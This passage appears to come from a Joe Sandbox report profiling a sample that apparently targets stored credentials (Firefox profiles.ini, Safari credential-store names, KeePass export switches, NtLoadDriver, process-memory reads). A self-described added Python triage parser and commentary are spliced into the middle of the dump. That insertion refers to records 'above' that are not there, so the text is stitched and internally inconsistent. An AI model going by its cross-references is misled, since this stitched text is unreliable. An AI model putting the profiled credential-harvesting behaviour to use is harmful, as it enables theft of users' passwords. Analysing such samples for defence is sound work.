                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                Strings
                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
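The two records above (the _wcsicmp function carrying the com.apple.Safari / com.apple.WebKit2WebProcess strings, and the dialog function that reads its own process memory and formats the "Exception %8.8X at address ..." register dump) are the kind an analyst pulls out of a report this long by script rather than by eye. The following is an added example, not Joe Sandbox code and not part of this report: it parses the IDA Plugin record format shown here (APIs / Strings / Similarity blocks, including the indented "Part of subcall function" lines and the "$"-packed String ID field) and labels functions whose API set and string references match a rule. The rule names, the API/string combinations and the reading of the Safari strings as credential-store target names are this example's assumptions; SAMPLE_RECORDS is a trimmed copy of the two records above.

```python
"""Triage the Joe Sandbox "IDA Plugin" function records shown above. Added
example, not Joe Sandbox code: parses the record text, collects each function's
APIs and referenced strings, and labels functions matching a rule. The rules are
this example's own assumptions, not findings stated by the report."""
import re
from dataclasses import dataclass, field

SAMPLE_RECORDS = r"""
APIs
• _wcsicmp.MSVCRT ref: 004022A6
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Similarity
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• _snwprintf.MSVCRT ref: 0041348E
Strings
• {Unknown}, xrefs: 004132A6
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
Similarity
• Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
"""

# "• api.MODULE(args), ref: ADDR", optionally prefixed by the subcall note
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
STRING_RE = re.compile(r"^•\s+(?P<s>.*), xrefs: (?P<ref>[0-9A-Fa-f]{8})$")
FIELD_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s?(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (api, module, ref, subcall address or None)
    strings: list = field(default_factory=list)  # (string, xref) from the Strings section
    fields: dict = field(default_factory=dict)   # Similarity / dump-source "key: value" pairs

    def api_names(self) -> set:
        return {api for api, _, _, _ in self.apis}

    def all_strings(self) -> list:
        # "String ID" packs every referenced string with '$' as separator, so a
        # literal "$" string turns into empty tokens; drop those.
        packed = [t for t in self.fields.get("String ID", "").split("$") if t]
        return [s for s, _ in self.strings] + packed


def parse_records(text: str) -> list:
    """One FunctionRecord per 'APIs' block, in report order."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()               # subcall lines are indented in the report
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":           # every record begins with its API list
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is None:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            current.apis.append((m["api"], m["mod"], m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            current.strings.append((m["s"], m["ref"]))
        elif section not in ("APIs", "Strings") and (m := FIELD_RE.match(line)):
            current.fields[m["key"]] = m["val"]
    return records


# Rule = (APIs that must all be present, string fragments of which one must appear).
# Assumed meanings: Safari-for-Windows credential-store target names beside
# GetProcAddress-resolved imports and LocalFree look like credential enumeration;
# ReadProcessMemory on the own process plus a register-dump format string is a
# crash-report dialog, not an injection primitive.
TRIAGE_RULES = {
    "browser_credential_access": ({"GetProcAddress", "LocalFree", "_wcsicmp"},
                                  ("com.apple.Safari", "com.apple.WebKit2WebProcess")),
    "crash_report_dialog": ({"GetCurrentProcess", "ReadProcessMemory", "_snwprintf"},
                            ("Exception %8.8X at address",)),
}


def triage(records: list) -> dict:
    """Opcode ID -> sorted rule names; functions without a hit are omitted."""
    hits = {}
    for rec in records:
        labels = [name for name, (apis, frags) in TRIAGE_RULES.items()
                  if apis <= rec.api_names()
                  and any(f in s for f in frags for s in rec.all_strings())]
        if labels:
            hits[rec.fields.get("Opcode ID", "")] = sorted(labels)
    return hits


if __name__ == "__main__":
    for oid, labels in triage(parse_records(SAMPLE_RECORDS)).items():
        print(oid[:16], ", ".join(labels))
```

Two points the rules encode are worth keeping in mind when reading the rest of this report. Subcall lines ("Part of subcall function ...") are counted as part of the function's behaviour, because that is where the dynamically resolved import (GetProcAddress) in the first record lives. And a ReadProcessMemory hit on a handle from GetCurrentProcess, next to a "Registers: EAX=..." format string, is the sample inspecting itself for a crash dialog; it should not be tallied as evidence of the remote-process injection that the report flags elsewhere.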
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
• Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
• Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
• Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
• Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
• Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
• Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
• Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
• Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
• Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
• Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
• Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
• Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
• Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
• Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
• Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
• Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
• Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
• Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
• Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
• Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
• Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID: ---
                                                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                • free.MSVCRT ref: 004186C7
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                • free.MSVCRT ref: 004186E0
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                • free.MSVCRT ref: 00418716
                                                                                                                                                • free.MSVCRT ref: 0041872A
                                                                                                                                                • free.MSVCRT ref: 00418749
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 3356672799-1717621600
                                                                                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
